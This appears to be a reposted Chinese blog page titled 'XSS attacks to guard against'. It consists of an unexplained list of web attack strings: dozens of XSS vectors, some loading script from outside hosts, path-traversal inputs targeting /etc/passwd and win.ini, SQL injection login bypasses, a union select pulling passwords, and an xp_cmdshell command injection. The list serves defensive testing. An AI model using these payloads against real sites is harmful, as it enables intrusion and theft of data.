zoukankan
html css js c++ java
需要防范的XSS攻击
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
查看全文
相关阅读:
推荐电影 迪士尼经典动画片大全 1937-2008
推荐电影 奥黛丽赫本的十大经典电影 1953-1989
生活娱乐 ATM机键盘余温泄露密码
生活娱乐 Wifi机器人的制作流程
生活娱乐 WIFI机器人(某机器发烧友自己动手做一台)
电脑技巧 ADSL如何远程盗号
生活娱乐 VERYCD的T恤设计大赛
系统重装 如何在固态硬盘上重装系统
Visual Studio VS如何统计代码行数
解决启动nginx时报80端口被占用的问题
原文地址:https://www.cnblogs.com/evlon/p/849543.html
最新文章
SpringBoot实战(十四)之整合KafKa
shell脚本之获取CPU使用率
maven项目红叉问题
<数据结构与算法分析>读书笔记--数学知识复习
Linux安装consul
服务发现系统etcd之安装和使用
使用docker-compose运行Django
使用docker-compose快速构建wordpress
<数据结构与算法分析>读书笔记--函数对象
java并发编程-Executor框架
热门文章
C#委托的介绍(delegate、Action、Func、predicate)
IReferenceCounted DotNetty.Common
Hex dump
Visual Studio 2017
Intent 介绍
Windows 10系统专业精简
CentOS7安装Gnome GUI图形界面
wget: command not found
ifconfig: command not found(CentOS专版,其他的可以参考)
推荐电影 历届奥斯卡获奖影片 1971-2008
Copyright © 2011-2022 走看看